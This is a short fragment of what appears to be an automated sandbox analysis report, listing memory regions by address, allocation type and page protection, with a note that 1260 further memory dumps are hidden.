page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D7000
heap
page read and write
2125BFD4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145BB00000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
2145E474000
trusted library allocation
page read and write
21475F40000
heap
page read and write
2145D4C7000
heap
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
There are 1260 hidden memdumps, click here to show them.